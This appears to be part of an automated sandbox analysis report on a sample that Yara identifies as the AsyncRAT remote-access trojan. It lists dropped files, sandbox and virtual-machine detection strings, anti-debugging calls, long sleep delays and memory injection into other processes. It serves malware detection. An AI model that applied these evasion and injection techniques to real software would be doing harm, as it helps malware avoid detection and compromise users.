Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\Libraries\vokleakA.pif

4_2_004019F0

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		0_2_0415245C
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		5_2_040C245C

Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\vokleakA.pif	Window / User API: threadDelayed 6537			Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Window / User API: threadDelayed 3314			Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sys			Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\vokleakA.pif

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_4-17750

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	API coverage: 7.4 %
Source: C:\Users\Public\Libraries\Akaelkov.PIF	API coverage: 5.7 %

Source: C:\Users\Public\Libraries\vokleakA.pif TID: 1220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif TID: 4112	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3580	Thread sleep count: 6537 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3580	Thread sleep count: 3314 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif TID: 5352	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\Public\Libraries\vokleakA.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04105C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_04105C18

Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Thread delayed: delay time: 922337203685477

Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxX
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Akaelkov.PIF, 00000008.00000003.2235031941.000000000090A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;
Source: vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Akaelkov.PIF, 00000005.00000002.2150878056.00000000007D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000883000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3235546216.000000003461D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2774428794.000000003461B000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Akaelkov.PIF, 00000005.00000002.2150878056.0000000000803000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL8
Source: vokleakA.pif, 00000004.00000002.3235435596.0000000034615000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	API call chain: ExitProcess graph end node			graph_0-58322
Source: C:\Users\Public\Libraries\Akaelkov.PIF	API call chain: ExitProcess graph end node			graph_5-40113

Source: C:\Users\Public\Libraries\vokleakA.pif

Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0040CE09

Source: C:\Users\Public\Libraries\vokleakA.pif

4_2_004019F0

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_0411FCD8

Source: C:\Users\Public\Libraries\vokleakA.pif

Code function: 4_2_0040ADB0 GetProcessHeap,HeapFree,

4_2_0040ADB0

Source: C:\Users\Public\Libraries\vokleakA.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_004123F1 SetUnhandledExceptionFilter,	4_2_004123F1
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_1_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_1_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_1_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_004123F1 SetUnhandledExceptionFilter,	4_1_004123F1
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_1_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_004123F1 SetUnhandledExceptionFilter,	7_1_004123F1
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040CE09
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040E61C
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_1_00416F6A
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_004123F1 SetUnhandledExceptionFilter,	9_1_004123F1

Source: C:\Users\Public\Libraries\vokleakA.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

